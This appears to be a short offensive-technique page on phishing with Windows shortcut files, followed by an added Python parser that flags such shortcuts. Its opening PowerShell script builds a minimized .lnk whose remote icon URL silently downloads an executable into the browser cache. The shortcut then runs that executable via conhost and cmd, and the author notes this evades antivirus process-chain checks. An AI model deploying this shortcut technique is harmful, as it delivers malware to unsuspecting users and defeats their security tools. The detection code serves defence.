# Phishing LNK

```
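# Create the shortcut on the desktop through the WScript.Shell COM object
$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
# The shortcut targets conhost.exe, which in turn starts cmd.exe
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
# 7 = start minimized
$shortcut.WindowStyle = 7;
# Search INetCache for the cached qwqdanchun*.exe and pipe its path to cmd.exe
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
# Remote icon URL: fetching the icon places the file in the cache
$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
$shortcut.Save();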
```

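This uses the icon cache to download the file, and uses conhost to get around antivirus checks on the process chain. (It only works on Win10; Win7 and other versions use a different cache directory. If you are interested, you can write that variant yourself.)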
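
For triage of collected `.lnk` files, the two traits of the shortcut above (an icon location that points off-host, and a command shell in the arguments) can be read straight from the file's StringData section. This is an added example, not code from the original page; it generalises the icon check to UNC paths as well as URLs, `build_sample` produces constructed test input, and it assumes the icon URL is stored in the ICON_LOCATION string as described in MS-SHLLINK.

```python
import re
import struct

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields follow in this fixed order, each gated by its own flag
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
REMOTE_ICON = re.compile(r"^\s*(https?://|\\\\)", re.IGNORECASE)  # URL or UNC path
SHELL_IN_ARGS = re.compile(r"\bcmd(\.exe)?\b", re.IGNORECASE)

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (arguments, icon location, ...) of a .lnk."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                    # end of the fixed-size header
    if flags & HAS_IDLIST:                      # 2-byte size, then the ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {}
    for field in [f for bit, f in STRING_FIELDS if flags & bit]:
        # 2-byte character count, then the string without a terminator
        size = struct.unpack_from("<H", data, pos)[0] * (2 if flags & IS_UNICODE else 1)
        raw = data[pos + 2:pos + 2 + size]
        if len(raw) != size:
            raise ValueError("truncated StringData")
        out[field] = raw.decode("utf-16-le" if flags & IS_UNICODE else "cp1252", "replace")
        pos += 2 + size
    return out

def findings(data: bytes) -> list:
    """Flag the two traits of the shortcut above: remote icon, shell in arguments."""
    s = parse_lnk_strings(data)
    hits = ["remote-icon"] if REMOTE_ICON.match(s.get("icon_location", "")) else []
    if SHELL_IN_ARGS.search(s.get("arguments", "")):
        hits.append("shell-in-arguments")
    return hits

def build_sample(arguments: str, icon: str) -> bytes:
    """Constructed minimal link: header plus ARGUMENTS and ICON_LOCATION only."""
    body = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", 0x20 | 0x40 | IS_UNICODE)
    body += bytes(76 - len(body))
    for s in (arguments, icon):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return body
```

To check a real file, pass its bytes: `findings(open(path, "rb").read())`.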

Reference:

{% embed url="<https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/>" %}
